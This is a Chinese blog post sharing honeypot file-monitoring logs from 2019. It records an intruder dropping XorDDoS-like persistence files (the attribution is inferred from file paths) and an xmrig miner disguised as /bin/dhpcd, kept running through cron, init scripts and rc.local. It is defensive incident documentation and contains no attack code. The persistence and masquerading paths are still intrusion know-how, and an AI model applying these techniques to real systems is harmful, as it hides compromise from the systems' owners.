蜜罐捕捉的日志脚本整理 – 作者:陌度

捕捉到的东西

https://github.com/yingshang/Legacy-of-intrusion.git

2019-3-19号

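黑客上传了几个脚本,其中一个会不断生成新文件并不断执行,直接把硬盘和内存撑爆,我的蜜罐直接被卡死。从下面的日志可以看到,/usr/bin 下大约每 5 秒就新建一个由 10 个随机小写字母命名的文件,同时还落地了 /lib/libudev.so、/etc/cron.hourly/gcc.sh 以及 /etc/init.d 和 rc1.d–rc5.d 下的启动项;这组路径与公开报告中的 XorDDoS 家族特征相符(仅凭文件路径推断,未做样本分析)。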

Line 13703: INFO:root:CREATE event : /dev/shm/BIdsqkKc  2019-03-19 11:33:33.934697
	Line 13862: INFO:root:CREATE event : /dev/shm/BIdsqkKc  2019-03-19 11:33:41.071763
	Line 14425: INFO:root:CREATE event : /dev/shm/B00M  2019-03-19 11:34:07.028623
	Line 14569: INFO:root:CREATE event : /dev/shm/TfkajmkIH  2019-03-19 11:34:13.624843
	Line 14709: INFO:root:CREATE event : /dev/shm/TfkajmkIH  2019-03-19 11:34:20.874330
	Line 15226: INFO:root:CREATE event : /dev/shm/B00M  2019-03-19 11:34:44.845148
	Line 15710: INFO:root:CREATE event : /root/mi3307  2019-03-19 11:47:38.111477
	Line 15918: INFO:root:CREATE event : /lib/libudev.so  2019-03-19 11:47:38.640116
	Line 16228: INFO:root:CREATE event : /usr/bin/mljdjbqxuq  2019-03-19 11:47:39.317262
	Line 16561: INFO:root:CREATE event : /etc/init.d/mljdjbqxuq  2019-03-19 11:47:39.754944
	Line 16575: INFO:root:CREATE event : /etc/cron.hourly/gcc.sh  2019-03-19 11:47:39.757342
	Line 16588: INFO:root:CREATE event : /etc/rc1.d/S90mljdjbqxuq  2019-03-19 11:47:39.760102
	Line 16591: INFO:root:CREATE event : /etc/rc2.d/S90mljdjbqxuq  2019-03-19 11:47:39.760918
	Line 16593: INFO:root:CREATE event : /etc/rc3.d/S90mljdjbqxuq  2019-03-19 11:47:39.761409
	Line 16595: INFO:root:CREATE event : /etc/rc4.d/S90mljdjbqxuq  2019-03-19 11:47:39.761975
	Line 16607: INFO:root:CREATE event : /etc/rc5.d/S90mljdjbqxuq  2019-03-19 11:47:39.763688
	Line 16703: INFO:root:CREATE event : /etc/sedTeXeUr  2019-03-19 11:47:39.786380
	Line 16713: INFO:root:CREATE event : /usr/bin/itwgznmnoq  2019-03-19 11:47:39.790291
	Line 17029: INFO:root:CREATE event : /run/gcc.pid  2019-03-19 11:47:39.880049
	Line 17699: INFO:root:CREATE event : /usr/bin/hdgxvqdrsm  2019-03-19 11:47:43.803555
	Line 18623: INFO:root:CREATE event : /usr/bin/tfyczjenzc  2019-03-19 11:47:48.795079
	Line 19734: INFO:root:CREATE event : /usr/bin/tcbajoqxih  2019-03-19 11:47:53.814405
	Line 20911: INFO:root:CREATE event : /usr/bin/qwqtwyndll  2019-03-19 11:47:58.862042
	Line 21996: INFO:root:CREATE event : /usr/bin/wlrxmjobio  2019-03-19 11:48:03.851830
	Line 23074: INFO:root:CREATE event : /usr/bin/rghrsafgrk  2019-03-19 11:48:08.877788
	Line 24066: INFO:root:CREATE event : /usr/bin/zgozhbbcyy  2019-03-19 11:48:13.910422
	Line 25160: INFO:root:CREATE event : /usr/bin/wvrtivxvlm  2019-03-19 11:48:18.932093
	Line 26254: INFO:root:CREATE event : /usr/bin/tepjqlylch  2019-03-19 11:48:23.973665
	Line 27355: INFO:root:CREATE event : /usr/bin/dpcuygdzwd  2019-03-19 11:48:29.063822
	Line 28441: INFO:root:CREATE event : /usr/bin/efuaffgsgs  2019-03-19 11:48:34.089048
	Line 29538: INFO:root:CREATE event : /usr/bin/gsfulgfjzd  2019-03-19 11:48:39.112690
	Line 30656: INFO:root:CREATE event : /usr/bin/tjminyopuf  2019-03-19 11:48:44.134765
	Line 31741: INFO:root:CREATE event : /usr/bin/qjyogmvqxv  2019-03-19 11:48:49.154488
	Line 32854: INFO:root:CREATE event : /usr/bin/avjvmbemyu  2019-03-19 11:48:54.203118
	Line 33878: INFO:root:CREATE event : /usr/bin/ibuidgnelw  2019-03-19 11:48:59.229367
	Line 34992: INFO:root:CREATE event : /usr/bin/iksgdzxmrr  2019-03-19 11:49:04.248427
	Line 36078: INFO:root:CREATE event : /usr/bin/dqhhhcfdrs  2019-03-19 11:49:09.282517
	Line 37195: INFO:root:CREATE event : /usr/bin/liryxanysl  2019-03-19 11:49:14.320403
	Line 38311: INFO:root:CREATE event : /usr/bin/ikvrwrtbar  2019-03-19 11:49:19.386290
	Line 39421: INFO:root:CREATE event : /usr/bin/wgbhpgkhva  2019-03-19 11:49:24.415379
	Line 40532: INFO:root:CREATE event : /usr/bin/ilwcdmjaxx  2019-03-19 11:49:29.484670
	Line 41613: INFO:root:CREATE event : /usr/bin/jzahqxwfix  2019-03-19 11:49:34.510543
	Line 42714: INFO:root:CREATE event : /usr/bin/hkjidwudsj  2019-03-19 11:49:39.584346
	Line 43802: INFO:root:CREATE event : /usr/bin/ettnlpziav  2019-03-19 11:49:44.645891
	Line 44898: INFO:root:CREATE event : /usr/bin/xzjrzdjjso  2019-03-19 11:49:49.646176
	Line 45996: INFO:root:CREATE event : /usr/bin/mrhxtxvoge  2019-03-19 11:49:54.707326
	Line 47069: INFO:root:CREATE event : /usr/bin/djohznghsk  2019-03-19 11:49:59.798660
	Line 48193: INFO:root:CREATE event : /usr/bin/caqliaehly  2019-03-19 11:50:04.833356
	Line 49296: INFO:root:CREATE event : /usr/bin/vrkxxcxzuj  2019-03-19 11:50:09.852183
	Line 50376: INFO:root:CREATE event : /usr/bin/joqhtqzygl  2019-03-19 11:50:14.892930
	Line 51465: INFO:root:CREATE event : /usr/bin/mvrmlzpfkr  2019-03-19 11:50:19.921282
	Line 52584: INFO:root:CREATE event : /usr/bin/xecszwdprk  2019-03-19 11:50:24.963665
	Line 53680: INFO:root:CREATE event : /usr/bin/eaenxzzblz  2019-03-19 11:50:29.990015
	Line 54500: INFO:root:CREATE event : /usr/bin/uuxflgtgay  2019-03-19 11:50:35.016746
	Line 55613: INFO:root:CREATE event : /usr/bin/sowaxanykz  2019-03-19 11:50:40.045852
	Line 56700: INFO:root:CREATE event : /usr/bin/rngverfygu  2019-03-19 11:50:45.069087
	Line 57797: INFO:root:CREATE event : /usr/bin/kelvnqcwgr  2019-03-19 11:50:50.112345
	Line 58917: INFO:root:CREATE event : /usr/bin/pjkfnqrxjl  2019-03-19 11:50:55.136699
	Line 60016: INFO:root:CREATE event : /usr/bin/wqzbdjdqfn  2019-03-19 11:51:00.188586
	Line 61128: INFO:root:CREATE event : /usr/bin/hpkdvojjxw  2019-03-19 11:51:05.210515
	Line 62249: INFO:root:CREATE event : /usr/bin/rhtoxzhlms  2019-03-19 11:51:10.234045
	Line 63354: INFO:root:CREATE event : /usr/bin/oqvwdfxeaw  2019-03-19 11:51:15.274103
	Line 64491: INFO:root:CREATE event : /usr/bin/cclojjaive  2019-03-19 11:51:20.317813
	Line 65593: INFO:root:CREATE event : /usr/bin/vqqpaelesh  2019-03-19 11:51:25.350728
	Line 66687: INFO:root:CREATE event : /usr/bin/rigapuhpdn  2019-03-19 11:51:30.383180
	Line 67822: INFO:root:CREATE event : /usr/bin/voqjewxuqu  2019-03-19 11:51:35.447531
	Line 68886: INFO:root:CREATE event : /usr/bin/ztxkldmywg  2019-03-19 11:51:40.447447
	Line 69968: INFO:root:CREATE event : /usr/bin/zgkwshpmss  2019-03-19 11:51:45.582693
	Line 71079: INFO:root:CREATE event : /usr/bin/upcultngri  2019-03-19 11:51:50.608717
	Line 72158: INFO:root:CREATE event : /usr/bin/rojksksovb  2019-03-19 11:51:55.640087
	Line 73243: INFO:root:CREATE event : /usr/bin/lalzylwttz  2019-03-19 11:52:00.664435
	Line 74343: INFO:root:CREATE event : /usr/bin/pvoljuuvng  2019-03-19 11:52:05.703119
	Line 75451: INFO:root:CREATE event : /usr/bin/juwtljomtq  2019-03-19 11:52:10.771522
	Line 76571: INFO:root:CREATE event : /usr/bin/ejqcwhvylv  2019-03-19 11:52:15.904960
	Line 77682: INFO:root:CREATE event : /usr/bin/dwarotcwei  2019-03-19 11:52:20.946080
	Line 78784: INFO:root:CREATE event : /usr/bin/nwlhaspckz  2019-03-19 11:52:25.985090
	Line 79894: INFO:root:CREATE event : /usr/bin/zomshobpvz  2019-03-19 11:52:31.100967
	Line 80984: INFO:root:CREATE event : /usr/bin/cdjucqrwsr  2019-03-19 11:52:36.243796
	Line 82076: INFO:root:CREATE event : /usr/bin/pnjlomfubx  2019-03-19 11:52:41.262007
	Line 83157: INFO:root:CREATE event : /usr/bin/kmcmzgokzm  2019-03-19 11:52:46.301496
	Line 84255: INFO:root:CREATE event : /usr/bin/zghzlgmsyj  2019-03-19 11:52:51.323833
	Line 85379: INFO:root:CREATE event : /usr/bin/tjsnhqgoog  2019-03-19 11:52:56.381780
	Line 86438: INFO:root:CREATE event : /usr/bin/lbodntcnpi  2019-03-19 11:53:01.384079
	Line 87523: INFO:root:CREATE event : /usr/bin/sclkrpxyrl  2019-03-19 11:53:06.397228
	Line 88718: INFO:root:CREATE event : /usr/bin/qimqfzkzxz  2019-03-19 11:53:11.483370
	Line 89801: INFO:root:CREATE event : /usr/bin/yhpjlrzndo  2019-03-19 11:53:16.493737
	Line 90892: INFO:root:CREATE event : /usr/bin/ztmfopzspc  2019-03-19 11:53:21.625367
	Line 91991: INFO:root:CREATE event : /usr/bin/jaxashciyq  2019-03-19 11:53:26.649283
	Line 93080: INFO:root:CREATE event : /usr/bin/jbwynyusjm  2019-03-19 11:53:31.667976
	Line 94141: INFO:root:CREATE event : /usr/bin/hwsqtsempg  2019-03-19 11:53:36.780939
	Line 95238: INFO:root:CREATE event : /usr/bin/welovbhjft  2019-03-19 11:53:41.863879
	Line 96150: INFO:root:CREATE event : /usr/bin/wlzubzaieu  2019-03-19 11:53:46.885064
	Line 97258: INFO:root:CREATE event : /usr/bin/tlnktrgouv  2019-03-19 11:53:51.934835
	Line 98322: INFO:root:CREATE event : /usr/bin/niozmehmuy  2019-03-19 11:53:56.993401
	Line 99320: INFO:root:CREATE event : /usr/bin/yyxuxablqc  2019-03-19 11:54:02.223188
	Line 100385: INFO:root:CREATE event : /usr/bin/xioswewick  2019-03-19 11:54:07.243593
	Line 101468: INFO:root:CREATE event : /usr/bin/kdhrthmfyv  2019-03-19 11:54:12.264061
	Line 102492: INFO:root:CREATE event : /usr/bin/mgnuwfmtbn  2019-03-19 11:54:17.279359
	Line 103486: INFO:root:CREATE event : /usr/bin/yldlboumsy  2019-03-19 11:54:22.297750
	Line 104678: INFO:root:CREATE event : /usr/bin/ywetrirkxi  2019-03-19 11:54:27.316287
	Line 105804: INFO:root:CREATE event : /usr/bin/jepqzfnftn  2019-03-19 11:54:32.333110
	Line 106890: INFO:root:CREATE event : /usr/bin/imqafwkjdw  2019-03-19 11:54:37.355253
	Line 108015: INFO:root:CREATE event : /usr/bin/qvygfqisbs  2019-03-19 11:54:42.370762
	Line 109151: INFO:root:CREATE event : /usr/bin/upvljogxuc  2019-03-19 11:54:47.392550
	Line 110244: INFO:root:CREATE event : /usr/bin/ydxqyonnnp  2019-03-19 11:54:52.409708
	Line 111367: INFO:root:CREATE event : /usr/bin/hgziqmhpst  2019-03-19 11:54:57.433024
	Line 112485: INFO:root:CREATE event : /usr/bin/qbdblchcdr  2019-03-19 11:55:02.453102
	Line 113608: INFO:root:CREATE event : /usr/bin/sywscbdtxw  2019-03-19 11:55:07.471159
	Line 114658: INFO:root:CREATE event : /usr/bin/hnykoobvyi  2019-03-19 11:55:12.489864
	Line 115778: INFO:root:CREATE event : /usr/bin/ntbewdfawr  2019-03-19 11:55:17.507733
	Line 116901: INFO:root:CREATE event : /usr/bin/cjiptqfzyn  2019-03-19 11:55:22.523887
	Line 118005: INFO:root:CREATE event : /usr/bin/kmkxseewmj  2019-03-19 11:55:27.544122
	Line 119119: INFO:root:CREATE event : /usr/bin/udvkhawyzw  2019-03-19 11:55:32.564481
	Line 120225: INFO:root:CREATE event : /usr/bin/iallspknhm  2019-03-19 11:55:37.584333
	Line 121445: INFO:root:CREATE event : /usr/bin/jinxrssxzc  2019-03-19 11:55:42.602588
	Line 122570: INFO:root:CREATE event : /usr/bin/refospazwn  2019-03-19 11:55:47.624460
	Line 123661: INFO:root:CREATE event : /usr/bin/ocnwsicxys  2019-03-19 11:55:52.640890
	Line 124893: INFO:root:CREATE event : /usr/bin/nhmsuqhjdp  2019-03-19 11:55:57.659310
	Line 125984: INFO:root:CREATE event : /usr/bin/gzaywdyqhr  2019-03-19 11:56:02.677282
	Line 127093: INFO:root:CREATE event : /usr/bin/izgnqjwzbe  2019-03-19 11:56:07.696340
	Line 128215: INFO:root:CREATE event : /usr/bin/yipnblnksp  2019-03-19 11:56:12.716089
	Line 129335: INFO:root:CREATE event : /usr/bin/fowgrzbpoo  2019-03-19 11:56:17.737022
	Line 130466: INFO:root:CREATE event : /usr/bin/hbwrucsaye  2019-03-19 11:56:22.755358
	Line 131555: INFO:root:CREATE event : /usr/bin/echktugnfh  2019-03-19 11:56:27.772768
	Line 132601: INFO:root:CREATE event : /usr/bin/rqhxnpgivg  2019-03-19 11:56:32.791967
	Line 133712: INFO:root:CREATE event : /usr/bin/ukxikaonip  2019-03-19 11:56:37.811970
	Line 134820: INFO:root:CREATE event : /usr/bin/axjjvapppz  2019-03-19 11:56:42.832591
	Line 135932: INFO:root:CREATE event : /usr/bin/mjcjwqedqv  2019-03-19 11:56:47.853416
	Line 137041: INFO:root:CREATE event : /usr/bin/fephwodrjv  2019-03-19 11:56:52.874117
	Line 138012: INFO:root:CREATE event : /usr/bin/tzlzjmxlfi  2019-03-19 11:56:57.893816
	Line 139117: INFO:root:CREATE event : /usr/bin/bzqptzkwfv  2019-03-19 11:57:02.910851
	Line 140205: INFO:root:CREATE event : /usr/bin/kplhzzybnr  2019-03-19 11:57:07.932082
	Line 141302: INFO:root:CREATE event : /usr/bin/dmuworqhap  2019-03-19 11:57:12.948061
	Line 142406: INFO:root:CREATE event : /usr/bin/wmazvhgoyq  2019-03-19 11:57:17.971944
	Line 143463: INFO:root:CREATE event : /usr/bin/zlvobfyvuo  2019-03-19 11:57:22.993139
	Line 144571: INFO:root:CREATE event : /usr/bin/xteuvtqgou  2019-03-19 11:57:28.009971
	Line 145678: INFO:root:CREATE event : /usr/bin/kigyaggzht  2019-03-19 11:57:33.032718
	Line 146787: INFO:root:CREATE event : /usr/bin/raeykerfvg  2019-03-19 11:57:38.051081
	Line 147888: INFO:root:CREATE event : /usr/bin/darjqjewfh  2019-03-19 11:57:43.074353
	Line 148972: INFO:root:CREATE event : /usr/bin/wxbnxxydvo  2019-03-19 11:57:48.096870
	Line 150079: INFO:root:CREATE event : /usr/bin/obcqcdsxuc  2019-03-19 11:57:53.137767
	Line 151192: INFO:root:CREATE event : /usr/bin/jveuwxenps  2019-03-19 11:57:58.132597
	Line 152050: INFO:root:CREATE event : /usr/bin/ettyutiier  2019-03-19 11:58:03.151999
	Line 153163: INFO:root:CREATE event : /usr/bin/tjjjjwicxu  2019-03-19 11:58:08.169554
	Line 154358: INFO:root:CREATE event : /usr/bin/hsehzxokyd  2019-03-19 11:58:13.187791
	Line 155218: INFO:root:CREATE event : /usr/bin/foctkvooxa  2019-03-19 11:58:18.237427
	Line 156336: INFO:root:CREATE event : /usr/bin/hmlwlqheph  2019-03-19 11:58:25.144106
	Line 157509: INFO:root:CREATE event : /usr/bin/wdxsweahga  2019-03-19 11:58:30.159639
	Line 158607: INFO:root:CREATE event : /usr/bin/zbzewvinhq  2019-03-19 11:58:35.197122
	Line 159541: INFO:root:CREATE event : /usr/bin/sagkohkajx  2019-03-19 11:58:40.247561
	Line 160672: INFO:root:CREATE event : /usr/bin/xjcsynmmvq  2019-03-19 11:58:45.239934
	Line 161875: INFO:root:CREATE event : /usr/bin/rcejcgrblq  2019-03-19 11:58:50.279780
	Line 162919: INFO:root:CREATE event : /usr/bin/rfdtscspik  2019-03-19 11:58:55.280718
	Line 163971: INFO:root:CREATE event : /usr/bin/aatumvjxpc  2019-03-19 11:59:00.299457
	Line 164953: INFO:root:CREATE event : /usr/bin/zxuqmzloir  2019-03-19 11:59:05.324995
	Line 166056: INFO:root:CREATE event : /usr/bin/nqgikjvtqg  2019-03-19 11:59:10.367343
	Line 167158: INFO:root:CREATE event : /usr/bin/fjptqhsgim  2019-03-19 11:59:15.357824
	Line 168290: INFO:root:CREATE event : /usr/bin/cqplewqfvz  2019-03-19 11:59:20.378778
	Line 169371: INFO:root:CREATE event : /usr/bin/wcrbyehplz  2019-03-19 11:59:25.395906
	Line 170487: INFO:root:CREATE event : /usr/bin/ajysxqmxuz  2019-03-19 11:59:30.415865
	Line 171510: INFO:root:CREATE event : /usr/bin/jwkeummbzr  2019-03-19 11:59:35.431802
	Line 172606: INFO:root:CREATE event : /usr/bin/nutapebskg  2019-03-19 11:59:40.455338
	Line 173785: INFO:root:CREATE event : /usr/bin/ysgktqqvty  2019-03-19 11:59:45.472435
	Line 174915: INFO:root:CREATE event : /usr/bin/kxerendyzp  2019-03-19 11:59:50.491086

2019-3-21号

门罗币挖矿:从下面的日志和 `./dhpcd -h` 的输出来看,攻击者投放的 /bin/dhpcd 实际上是 xmrig,并被写进 /etc/rc.local 实现开机自启。

root@localhost:/record# cat monitor.log | grep CREATE
INFO:root:CREATE event : /dev/pts/0  2019-03-20 02:08:54.558236
INFO:root:CREATE event : /usr/operation  2019-03-20 02:09:11.379264
INFO:root:CREATE event : /dev/pts/0  2019-03-20 04:09:38.896324
INFO:root:CREATE event : /root/.bash_history  2019-03-20 04:10:02.758810
INFO:root:CREATE event : /bin/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:13:13.196724
INFO:root:CREATE event : /bin/dhpcd  2019-03-20 15:13:21.085534
INFO:root:CREATE event : /etc/nshadow  2019-03-20 15:13:53.019796
INFO:root:CREATE event : /root/.ssh  2019-03-20 15:14:13.246905
INFO:root:CREATE event : /dev/shm/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:18.103935
INFO:root:CREATE event : /tmp/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:28.352342
INFO:root:CREATE event : /tmp/knrm  2019-03-20 15:14:33.395370
INFO:root:CREATE event : /tmp/r  2019-03-20 15:14:37.392344
INFO:root:CREATE event : /tmp/tmp.efsTWF68ua  2019-03-20 15:14:40.254357
INFO:root:CREATE event : /etc/sedRnzDvp  2019-03-20 15:14:40.262898
INFO:root:CREATE event : /var/spool/cron/crontabs/tmp.wkldnB  2019-03-20 15:14:40.526935
INFO:root:CREATE event : /tmp/tmp.O5mRAvm7ST  2019-03-20 15:14:48.853449
INFO:root:CREATE event : /etc/sed1evIks  2019-03-20 15:14:48.857253
INFO:root:CREATE event : /var/spool/cron/crontabs/tmp.5gdVYA  2019-03-20 15:14:49.207956
INFO:root:CREATE event : /bin/dhpcd  2019-03-20 15:14:53.271247
root@localhost:/record# cat monitor.log | grep MODI
INFO:root:MODIFY event : /run/utmp  2019-03-20 02:09:11.359695
INFO:root:MODIFY event : /dev/null  2019-03-20 02:09:11.395338
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 02:09:11.406661
INFO:root:MODIFY event : /run/utmp  2019-03-20 02:09:11.495534
INFO:root:MODIFY event : /sys/fs/cgroup/hugetlb/cgroup.procs  2019-03-20 04:09:38.821148
INFO:root:MODIFY event : /sys/fs/cgroup/hugetlb/cgroup.procs  2019-03-20 04:09:38.822800
INFO:root:MODIFY event : /sys/fs/cgroup/systemd/cgroup.procs  2019-03-20 04:09:38.844848
INFO:root:MODIFY event : /sys/fs/cgroup/systemd/cgroup.procs  2019-03-20 04:09:38.854813
INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.855580
INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.856195
INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.856689
INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs  2019-03-20 04:09:38.859445
INFO:root:MODIFY event : /sys/fs/cgroup/pids/cgroup.procs  2019-03-20 04:09:38.860014
INFO:root:MODIFY event : /sys/fs/cgroup/pids/cgroup.procs  2019-03-20 04:09:38.860579
INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.861078
INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.861639
INFO:root:MODIFY event : /sys/fs/cgroup/freezer/cgroup.procs  2019-03-20 04:09:38.862137
INFO:root:MODIFY event : /sys/fs/cgroup/freezer/cgroup.procs  2019-03-20 04:09:38.867408
INFO:root:MODIFY event : /sys/fs/cgroup/cpuset/cgroup.procs  2019-03-20 04:09:38.868089
INFO:root:MODIFY event : /sys/fs/cgroup/cpuset/cgroup.procs  2019-03-20 04:09:38.868791
INFO:root:MODIFY event : /sys/fs/cgroup/devices/cgroup.procs  2019-03-20 04:09:38.869305
INFO:root:MODIFY event : /sys/fs/cgroup/devices/cgroup.procs  2019-03-20 04:09:38.869973
INFO:root:MODIFY event : /sys/fs/cgroup/memory/cgroup.procs  2019-03-20 04:09:38.870519
INFO:root:MODIFY event : /sys/fs/cgroup/memory/cgroup.procs  2019-03-20 04:09:38.875420
INFO:root:MODIFY event : /sys/fs/cgroup/perf_event/cgroup.procs  2019-03-20 04:09:38.875940
INFO:root:MODIFY event : /sys/fs/cgroup/perf_event/cgroup.procs  2019-03-20 04:09:38.876589
INFO:root:MODIFY event : /sys/fs/cgroup/blkio/cgroup.procs  2019-03-20 04:09:38.877095
INFO:root:MODIFY event : /sys/fs/cgroup/blkio/cgroup.procs  2019-03-20 04:09:38.877714
INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.878251
INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs  2019-03-20 04:09:38.878898
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:39.164499
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.176459
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.313840
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.414496
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:40.541559
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:41.018949
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:41.167878
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:41.480871
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.132803
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.371361
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.558634
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:42.773391
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.287925
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.377093
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.590337
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.840286
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:43.927635
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:44.055641
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:45.080589
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:45.256384
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:45.456842
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:46.861468
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.374563
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.538828
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.651745
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:47.721959
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:48.868994
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:49.019794
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:49.081561
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:49.094732
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.515933
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.640233
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.688437
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:51.689514
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:53.395020
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:53.596157
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:53.823423
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.049726
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.210870
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.412377
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.512597
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.662840
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.686100
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.686901
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:54.687545
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.027683
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.152111
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.252011
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.390181
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.566355
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.640919
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:09:59.917892
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:00.105004
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:01.348837
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:01.673340
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:01.861180
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:02.062987
INFO:root:MODIFY event : /dev/pts/0  2019-03-20 04:10:02.740363
INFO:root:MODIFY event : /root/.bash_history  2019-03-20 04:10:02.763356
INFO:root:MODIFY event : /bin/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:13:13.695989
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:22.908247
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:24.316824
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:25.196549
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:26.028442
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:26.906511
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:27.775044
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:28.648578
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:29.552310
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:30.428356
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:31.283118
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:32.187718
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:33.258305
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:34.241886
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:35.284409
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:36.296268
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:37.413299
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:38.281973
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:39.200778
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:40.981730
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:42.768890
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:42.769996
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:13:43.825358
INFO:root:MODIFY event : /etc/nshadow  2019-03-20 15:13:53.022030
INFO:root:MODIFY event : /dev/shm/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:18.455523
INFO:root:MODIFY event : /tmp/ets9b876j46x1a589wmo4htdu7  2019-03-20 15:14:28.775480
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.118183
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.253943
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.462640
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.676316
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:34.835138
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:35.051863
INFO:root:MODIFY event : /tmp/knrm  2019-03-20 15:14:35.177190
INFO:root:MODIFY event : /tmp/r  2019-03-20 15:14:37.928084
INFO:root:MODIFY event : /etc/sedRnzDvp  2019-03-20 15:14:40.270026
INFO:root:MODIFY event : /var/spool/cron/crontabs/tmp.wkldnB  2019-03-20 15:14:40.528250
INFO:root:MODIFY event : /dev/null  2019-03-20 15:14:43.419044
INFO:root:MODIFY event : /etc/sed1evIks  2019-03-20 15:14:48.857973
